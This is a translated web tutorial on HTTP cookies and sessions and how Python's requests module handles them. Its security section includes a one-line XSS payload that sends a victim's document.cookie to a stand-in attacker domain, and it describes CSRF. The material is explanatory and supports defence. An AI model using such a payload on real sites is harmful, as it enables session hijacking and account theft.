2025-01-19 Update From: SLTechnology News&Howtos (Shulou.com)
In this issue, the editor walks through the key knowledge points about Cookie in Python. The article is rich in content and analyzes the topic from a professional point of view; I hope you get something out of it.
Many students have heard of Cookie and roughly understand what it does, but how it works and how to set it may be unclear to those who have not done web development. Cookie has come up in previous Python tutorials, so today we take a closer look at it!
I. Background of birth
In the first of a series of crawler tutorials, we talked about the five features of HTTP, and one of them is statelessness.
HTTP stateless: the server cannot know whether two requests are from the same browser, that is, the server does not know what the user did last time, and each request is completely independent of each other.
In the early days, the Internet was used for simple browsing of documents, yellow pages, portals, and so on, with no real interaction. As the Internet developed and broadband, servers and other hardware improved greatly, people could do more online, and the interactive Web gradually rose. The stateless nature of HTTP seriously hindered that development!
Interactive Web: the client can interact with the server, such as user login, purchasing goods, various forums, etc.
What if you can't record what the user did last time? Smart programmers began to think: how can we record the user's last operation? So someone thought of the hidden field.
Hidden field writing: <input type="hidden" name="field_name" value="value">
This puts the record of the user's last action in an input element of the form, so that when the form is submitted with the next request, the server knows what the user did last time. But you have to create a hidden field and assign its value on every page, which is troublesome and error-prone!
Ps: the hidden field is still very useful, and many people use it today to solve all kinds of problems!
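To make the hidden-field idea concrete, here is a minimal sketch using only the Python standard library. The field name `last_action`, the `/next` URL and both helper functions are illustrative assumptions, not part of the original tutorial.

```python
from html import escape
from urllib.parse import parse_qs


def render_form(last_action: str) -> str:
    """Return an HTML form that carries the previous action in a hidden field."""
    value = escape(last_action, quote=True)
    return (
        '<form action="/next" method="post">\n'
        f'  <input type="hidden" name="last_action" value="{value}">\n'
        '  <input type="submit" value="Continue">\n'
        "</form>"
    )


def read_last_action(form_body: str) -> str:
    """Recover the hidden field from a URL-encoded form submission."""
    fields = parse_qs(form_body)
    return fields.get("last_action", [""])[0]


print(render_form("added item 42 to cart"))

# What a browser would send back when the form is submitted:
submitted = "last_action=added+item+42+to+cart"
print(read_last_action(submitted))
```

Every page has to render the field again, which is exactly the bookkeeping burden the text describes.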
Lou Montulli, a Netscape employee at the time, applied the concept of "cookies" to network communication in 1994 in order to keep a shopping-cart history for users shopping online. Netscape was the most powerful browser of its day, and once it supported Cookie, other browsers gradually followed. Today all major browsers support Cookie.
II. What is Cookie?
We already know that Cookie was born to solve the problem that HTTP's stateless feature can't satisfy interactive web, so what is it?
The picture above is the Cookies (plural form of Cookie) on the home page of Baidu in the Chrome browser. In the table, each row represents a Cookie, so let's take a look at the definition of Cookie.
A Cookie is a piece of special information that the server sends to the client, which the client stores as text. The client then sends this information back with every request to the server, and the server uses it to keep track of the client's state.
Cookie is mainly used in the following three aspects:
Session state management (such as user login status, shopping cart, game scores, or other information that needs to be recorded)
Personalized settings (such as user-defined settings, themes, etc.)
Browser behavior tracking (such as tracking and analyzing user behavior, etc.)
III. Cookie principle
We have learned that Cookie is a process in which the server sends out special information stored in the browser. In order to make it easier for everyone to understand, Brother Pig drew a Cookie schematic diagram for you by taking user login as an example.
After the user enters the user name and password, the browser sends them to the server, and the server verifies them. After verification, the user information is encrypted and packaged as a Cookie, which is returned to the browser in the response header.
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Thu, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.169it.com; HttpOnly

[response body]
When the browser receives the data returned by the server, it finds a Set-Cookie in the response header and saves the Cookie. The next time the browser requests the server, it passes the Cookie back in the request header:
GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg
After receiving the request, the server takes the Cookie from the request header and parses it to recover the user information, which shows that the user is logged in. In other words, Cookie keeps the data on the client.
Here we can see that the user information is saved in the Cookie, which means it is saved in the browser. The user can therefore modify that information at will, which makes this an insecure approach!
Emphasize one point: in both directions the Cookie travels in an HTTP header! The server sends it to the browser in the Set-Cookie response header, and the browser sends it back to the server in the Cookie request header.
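The round trip described above can be traced with the standard library's `http.cookies` module. This is only a sketch of what a browser does internally: the header value is taken from the example response (without its Expires attribute), and `SimpleCookie` stands in for the browser's cookie store.

```python
from http.cookies import SimpleCookie

# Step 1: the server's response carries a Set-Cookie header with this value.
set_cookie_value = (
    "user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Path=/; Domain=.169it.com; HttpOnly"
)

# Step 2: the client parses it and stores the name, value and attributes.
jar = SimpleCookie()
jar.load(set_cookie_value)
morsel = jar["user_cookie"]
print(morsel.key, morsel.value, morsel["path"], morsel["domain"])

# Step 3: on the next request only name=value pairs go back to the server,
# in the Cookie request header. The attributes stay on the client.
cookie_header = "; ".join(f"{m.key}={m.value}" for m in jar.values())
print("Cookie:", cookie_header)
```

Note that attributes such as Path and HttpOnly never appear in the request: they only tell the client when to send the cookie.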
IV. Cookie attribute
In the following figure, we can see that a Cookie has attributes such as Name, Value, Domain, Path, Expires/Max-Age, Size, HTTP, and Secure, so what are the functions of these attributes? Let's take a look.
1. Name&Value
Name represents the name of the Cookie, and the server acquires a cookie value through the name property.
Value represents the value of Cookie, and in most cases the server will use this value as a key to query the saved data.
2. Domain&Path
Domain indicates which domain names can access this cookie. In the following figure, we use the Cookie on the Baidu Tieba page to explain the Domain attribute.
From the picture above, we can see two Domain values: .baidu.com, the top-level domain name (here meaning the site's root domain, not a TLD such as .com), and .tieba.baidu.com, a second-level domain name. This gives an access rule: a top-level domain name can only set or access Cookies of the top-level domain, while second-level and lower domain names can only set or access Cookies of their own domain or of the top-level domain. So if you want to share a Cookie among multiple second-level domain names, you must set its Domain attribute to the top-level domain name!
Path indicates the page path under which this cookie can be accessed. For example, with path=/test, only pages under the /test path can read this cookie.
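The two matching rules can be sketched as small predicates. The function names are made up for illustration, and the logic is a simplified reading of the domain-match and path-match rules in RFC 6265; real browsers also apply further checks (for example, refusing cookies scoped to public suffixes).

```python
def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """True if a cookie scoped to cookie_domain would be sent to request_host."""
    host = request_host.lower()
    domain = cookie_domain.lower().lstrip(".")
    return host == domain or host.endswith("." + domain)


def path_matches(request_path: str, cookie_path: str) -> bool:
    """True if a cookie scoped to cookie_path would be sent for request_path."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        # "/test" must match "/test/page" but not "/testing".
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


# A cookie with Domain=.baidu.com is shared by every subdomain.
print(domain_matches("tieba.baidu.com", ".baidu.com"))
# A cookie with Domain=.tieba.baidu.com is not visible to www.baidu.com.
print(domain_matches("www.baidu.com", ".tieba.baidu.com"))
# A cookie with Path=/test is sent for pages under /test only.
print(path_matches("/test/page", "/test"), path_matches("/other", "/test"))
```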
3. Expires/Max-Age
Expires/Max-Age sets when this cookie times out: Expires takes an absolute date and Max-Age a lifetime in seconds. Once that time is reached, the cookie becomes invalid. If neither is set, the value defaults to Session, which means the cookie lasts only as long as the browser session: it becomes invalid when the browser is closed (the entire browser, not just a browser tab).
Tip: the expiration time of a Cookie is checked against the client's clock, not the server's.
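As a rough illustration of the three cases (Max-Age, Expires, and neither), the sketch below builds the corresponding Set-Cookie values with `http.cookies`. The cookie names `theme` and `cart` and the expiry date are arbitrary choices for the example.

```python
from datetime import datetime, timezone
from email.utils import format_datetime
from http.cookies import SimpleCookie

cookie = SimpleCookie()

# Persistent cookie with a relative lifetime, in seconds.
cookie["theme"] = "dark"
cookie["theme"]["max-age"] = 3600

# Persistent cookie with an absolute expiry date (HTTP dates are given in GMT).
expires_at = datetime(2030, 1, 1, tzinfo=timezone.utc)
cookie["user_cookie"] = "Rg3vHJZnehYLjVg7qi3bZjzg"
cookie["user_cookie"]["expires"] = format_datetime(expires_at, usegmt=True)

# Session cookie: no Expires or Max-Age, so it is dropped when the browser closes.
cookie["cart"] = "3"

for morsel in cookie.values():
    print("Set-Cookie:", morsel.OutputString())
```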
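4. Size
Size represents the number of characters in the name plus the value of the Cookie. For example, for the Cookie id=666, Size=2+3=5.
In addition, browsers differ in how many Cookies they allow and how large each one may be. RFC 6265 only recommends minimums: at least 4096 bytes per cookie and at least 50 cookies per domain.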
5. HTTP
HTTP represents the HttpOnly attribute of the cookie. If it is set, the cookie is only carried in HTTP headers and cannot be accessed from JavaScript through document.cookie.
This feature is a security measure that helps prevent cross-site scripting (XSS) attacks from stealing the cookie through JavaScript.
6. Secure
Secure indicates whether this cookie may only be sent over HTTPS. Unlike other options, this option is just a flag and takes no value.
Setting it signals that the cookie's content is valuable and could be intercepted or cracked if it were transmitted in plain text.
V. Python operates Cookie
1. Generate Cookie
As we said earlier, Cookie is generated by the server, so how to generate it with Python code?
From the login code in the figure above, we can see that after simply verifying the user name and password, the server redirects to /user and sets a cookie. The browser receives the response, finds the response header Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg, and saves the Cookie!
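The login flow just described might look roughly like the sketch below. It is not the tutorial's own code: it uses only the standard library rather than a web framework, and the `USERS` table, the `login` function and the random cookie value are assumptions made for illustration.

```python
import secrets
from http.cookies import SimpleCookie

# Hypothetical credential store; a real application would check hashed passwords.
USERS = {"alice": "s3cret"}


def login(username: str, password: str):
    """Return (status, headers) for a login attempt."""
    if USERS.get(username) != password:
        return 401, [("Content-Type", "text/plain")]

    cookie = SimpleCookie()
    cookie["user_cookie"] = secrets.token_urlsafe(18)  # opaque random value
    cookie["user_cookie"]["path"] = "/"
    cookie["user_cookie"]["httponly"] = True

    # Redirect to /user and ask the browser to store the cookie.
    return 302, [
        ("Location", "/user"),
        ("Set-Cookie", cookie["user_cookie"].OutputString()),
    ]


status, headers = login("alice", "s3cret")
print(status)
for name, value in headers:
    print(f"{name}: {value}")
```

In a framework such as Flask or Django the same step is normally a single call on the response object; the sketch only shows which headers end up on the wire.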
2. Get Cookie
Recently we've been talking about the requests module, so here we use the requests module to get the Cookie.
r.cookies returns all the cookies set by the response, and its get_dict() method returns them as a dictionary.
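A self-contained way to try `r.cookies` and `get_dict()` is to point requests at a throwaway local server, as sketched below. `CookieHandler` and `fetch_cookies` are hypothetical names, and the local server merely stands in for whichever real site the original example requested.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

import requests


class CookieHandler(BaseHTTPRequestHandler):
    """Hypothetical stand-in for a real site: sets one cookie per response."""

    def do_GET(self):
        body = b"ok"
        self.send_response(200)
        self.send_header("Set-Cookie", "user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Path=/")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # silence per-request logging


def fetch_cookies() -> dict:
    """Start the toy server, request it once, and return the response cookies."""
    server = HTTPServer(("127.0.0.1", 0), CookieHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        session = requests.Session()
        session.trust_env = False  # ignore proxy settings for this local request
        r = session.get(f"http://127.0.0.1:{server.server_port}/", timeout=5)
        return r.cookies.get_dict()
    finally:
        server.shutdown()
        server.server_close()


print(fetch_cookies())
```

Against a real site the same two steps apply: make the request, then read `r.cookies.get_dict()` on the response.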
3. Set up Cookie
In the last article, when we crawled Youku's on-screen comments, we used the requests module to set up Cookie.
We put the Cookie copied from the browser into the code, so that the crawler can pass itself off as a browser and fetch data normally. Copying Cookie is a common technique in crawlers!
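Passing a copied Cookie to requests can be sketched as follows. The cookie value and URL are the placeholders from the earlier HTTP example rather than anything copied from Youku, and the request is only prepared, not sent, so the resulting header can be inspected offline.

```python
import requests

# Cookie copied from the browser's developer tools (placeholder value).
cookies = {"user_cookie": "Rg3vHJZnehYLjVg7qi3bZjzg"}

# Preparing the request shows the header without touching the network.
prepared = requests.Request(
    "GET", "http://www.example.org/sample_page.html", cookies=cookies
).prepare()
print(prepared.headers["Cookie"])

# To actually send it, pass the same dictionary to requests.get:
# r = requests.get("http://www.example.org/sample_page.html", cookies=cookies)
```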
VI. Session
1. Birth background
In fact, Cookie as originally designed did not work the way Brother Pig described above, saving only a key; it saved the user information directly. At first this seemed convenient, but because a cookie lives on the user's side, its storage size is limited and, most importantly, the user can see it and modify it at will, which is very unsafe. So how can information be read globally in a way that is both safe and convenient? This is when a new mechanism for saving session state, Session, was born.
2. What is Session?
A Session is a conversation between one browser and the server, and the server creates a Session object for each browser. When the browser first requests the server, the server generates a Session object for it, saves it on the server, and sends the Id of the Session to the client in the form of a cookie. The Session ends when the user explicitly ends it or when it times out.
Let's take a look at how Session works:
When a user sends the first request to the server, the server establishes a session for it and creates an identification number (sessionID) for this session.
All subsequent requests by this user should include this identification number (sessionID). The server checks the identification number to determine which session the request belongs to.
For session identification number (sessionID), there are two ways to implement it: Cookie and URL rewriting. Brother Pig draws a Session schematic diagram in the way of Cookie.
Comparing this with the Cookie schematic, we can see that Cookie saves the data directly on the client, while Session saves the data on the server, so Session is better in terms of security!
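The server side of this mechanism can be sketched as an in-memory table keyed by sessionID. Everything here is an assumption made for illustration: the function names, the 30-minute timeout and the plain dictionary, which a real application would replace with a framework's session support or a shared store.

```python
import secrets
import time

SESSION_TTL = 30 * 60  # seconds of inactivity before a session expires (assumed)
_sessions = {}  # session_id -> {"data": dict, "last_seen": float}


def create_session(user_data, now=None):
    """Create a session on the server and return the ID to send as a cookie."""
    session_id = secrets.token_urlsafe(32)
    _sessions[session_id] = {
        "data": dict(user_data),
        "last_seen": time.time() if now is None else now,
    }
    return session_id


def load_session(session_id, now=None):
    """Return the data for a session ID, or None if unknown or timed out."""
    now = time.time() if now is None else now
    entry = _sessions.get(session_id)
    if entry is None:
        return None
    if now - entry["last_seen"] > SESSION_TTL:
        del _sessions[session_id]
        return None
    entry["last_seen"] = now
    return entry["data"]


def end_session(session_id):
    """Explicitly end a session, for example on logout."""
    _sessions.pop(session_id, None)


sid = create_session({"user": "alice"})
print(load_session(sid))       # data stays on the server
print(load_session("forged"))  # an unknown ID gives the client nothing
```

The client only ever holds the random ID, so editing the cookie cannot change the stored user data.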
3. Python operates Session
Later, Brother Pig will use the login example to explain how to manipulate Session with Python code.
VII. Interview scene
1. The relationship between Cookie and Session
Both were created to support interaction between the client and the server.
Cookie is stored on the client side; its shortcomings are that it is easy to forge and unsafe.
Session is stored on the server side and consumes server resources.
There are two ways to implement Session: Cookie and URL rewriting.
2. Security problems caused by Cookie
Session hijacking and XSS: in Web applications, Cookie is often used to identify users or authorize sessions. If the Cookie of a Web application is stolen, the session of the authorized user may be hijacked. Common ways to steal Cookie are social engineering and XSS attacks that exploit application vulnerabilities:
(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
A Cookie marked HttpOnly can mitigate such attacks to some extent because JavaScript cannot access it.
Cross-site request forgery (CSRF): Wikipedia has given a good example of CSRF. For example, a picture on an insecure chat room or forum is actually a request to withdraw cash to your bank server:
When you open the HTML page containing this image, if you have previously logged in to your bank account and the Cookie is still valid (and there are no other verification steps), the money in your account may well be transferred automatically. Defenses against CSRF include a verification token in a hidden field, a confirmation step, and a short Cookie lifetime.
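The hidden-field token defense can be sketched in a few lines. The helper names and the `csrf_token` key are assumptions for illustration, and `session` is simply a dictionary standing in for the user's server-side session.

```python
import hmac
import secrets


def issue_csrf_token(session: dict) -> str:
    """Store a fresh random token in the session and return it for the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_valid_csrf(session: dict, submitted_token: str) -> bool:
    """Accept the request only if the form carried the session's token."""
    expected = session.get("csrf_token")
    if not expected or not submitted_token:
        return False
    # Constant-time comparison avoids leaking the token through timing.
    return hmac.compare_digest(expected.encode(), submitted_token.encode())


session = {}
token = issue_csrf_token(session)  # rendered into a hidden form field
print(is_valid_csrf(session, token))     # genuine form submission
print(is_valid_csrf(session, "forged"))  # forged cross-site request
```

A forged image or form on another site still carries the victim's Cookie, but it cannot read the token, so the check fails.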
VIII. Summary
Today, I explained the relevant knowledge of Cookie and how to use the requests module to operate Cookie. Finally, I mentioned the relationship between Cookie and Session and what security problems exist in Cookie.
These are the Cookie knowledge points for Python shared by the editor. If you have had similar questions, the analysis above may help you understand.